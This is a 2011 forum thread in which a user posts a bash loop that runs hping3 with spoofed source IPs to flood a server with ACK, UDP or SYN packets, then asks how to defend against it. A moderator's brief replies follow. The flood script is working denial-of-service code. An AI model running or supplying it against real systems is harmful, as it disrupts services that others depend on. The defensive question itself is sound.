473,324 Members | 2,313 Online
Bytes | Software Development & Data Engineering Community
Post Job

Home Posts Topics Members FAQ

Join Bytes to post your question to a community of 473,324 software developers and data experts.

How to avoid such DoS attacks?

15
I'm using hping3 on Ubuntu.
Expand|Select|Wrap|Line Numbers
  1. #!usr/bin/bash
  2. # no-jkpg-msg
  3.  
  4. while true; do
  5. hping3 [ip_addr] -A -f -p [port_nr] -i u100 --spoof [ip_addr]
  6. # hping3 [ip_addr] --udp -f -i u100 -p [port_nr] --spoof [ip_addr]
  7. # hping3 [ip_addr] -S -f -p [port_nr] -i u100 --spoof [ip_addr]
  8. # etc...
  9. done
  10.  
I've tested my servers using such operations. If such a command is executed once, then "[send_ip] sendto: Operation not permitted" appears, but if I set the command in an infinite loop, the operation gets eventually permitted. Any idea how to avoid such an attack?
Aug 13 '11 #1
3 3396
sicarie
4,677 Expert Mod 4TB
It looks like the operating is not being permitted on the send side. Are you worried that one of your systems will be involved in starting an attack?

You can lock down programs such as hping through various methods, but I'm not entirely sure what your question is.
Aug 17 '11 #2
Ramsin
15
My question is: How would you protect a system from that flooding attack?
Aug 17 '11 #3
sicarie
4,677 Expert Mod 4TB
There are several ways, such as this Wikipedia page on ddos attacks outlines.
Aug 18 '11 #4

Sign in to post your reply or Sign up for a free account.

Similar topics

2
by: Martin Lucas-Smith | last post by:
Can anyone provide any suggestions/URLs for best-practice approaches to preventing SQL injection? There seems to be little on the web that I can find on this. Martin Lucas-Smith ...
44
by: Carlos Andr?s | last post by:
Hi everybody. I've got a problem. I'd like to avoid opening a new window when you have pressed the shift key and you click in the left button of the mouse. I've tried the next solution, in the...
2
by: freddy | last post by:
I would like to get more information on securing my windows apps from SQL injection attacks. There is so much stuff on web apps, but I can't find info on win apps. Can you help me
1
by: CW | last post by:
It's recommended that when signing on using FormsAuthentication, one should do so over a secure (SSL) channel. If I understand FormsAuthentication mechanism correctly, the Authentication ticket...
4
by: poppy | last post by:
I think a site I developed has been the victim of a sql injection attack.I know how to stop this happening in future but: Is there any way I can trace such an attack?
9
by: Darrel | last post by:
I'm learning a bit about the SWL injection issues and want to write a shared class that I can call from anywhere in my project to 'sanitize' any incoming text from textfields before sending to the...
5
by: www.douglassdavis.com | last post by:
I have an idea for preventing sql injection attacks, however it would have to be implemented by the database vendor. Let me know if I am on the right track, this totally off base, or already...
2
by: mvendertaca | last post by:
I've created a usercontrol which is hosted in Internet Explorer. It with some action buttons. I could place all buttons on this usercontrol but I did not. When the user presses one of the buttons i...
3
by: A TO Consultant | last post by:
Hi All, I am working on a web application that uses both asp classic and asp.net pages. We need to validate user input to avoid attacks like sql injection. Can a component be created that both...
3
by: Baheri | last post by:
Does any one have a sample on how can replay attacks be prevented in a webservice?
0
by: DolphinDB | last post by:
Tired of spending countless mintues downsampling your data? Look no further! In this article, you’ll learn how to efficiently downsample 6.48 billion high-frequency records to 61 million...
0
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
1
isladogs
by: isladogs | last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM). In this month's session, we are pleased to welcome back...
0
by: Vimpel783 | last post by:
Hello! Guys, I found this code on the Internet, but I need to modify it a little. It works well, the problem is this: Data is sent from only one cell, in this case B5, but it is necessary that data...
1
by: PapaRatzi | last post by:
Hello, I am teaching myself MS Access forms design and Visual Basic. I've created a table to capture a list of Top 30 singles and forms to capture new entries. The final step is a form (unbound)...
1
by: CloudSolutions | last post by:
Introduction: For many beginners and individual users, requiring a credit card and email registration may pose a barrier when starting to use cloud servers. However, some cloud server providers now...
1
by: Defcon1945 | last post by:
I'm trying to learn Python using Pycharm but import shutil doesn't work
0
by: af34tf | last post by:
Hi Guys, I have a domain whose name is BytesLimited.com, and I want to sell it. Does anyone know about platforms that allow me to list my domain in auction for free. Thank you
0
isladogs
by: isladogs | last post by:
The next Access Europe User Group meeting will be on Wednesday 3 Apr 2024 starting at 18:00 UK time (6PM UTC+1) and finishing by 19:30 (7.30PM). In this session, we are pleased to welcome former...

By using Bytes.com and it's services, you agree to our Privacy Policy and Terms of Use.

To disable or enable advertisements and analytics tracking please visit the manage ads & tracking page.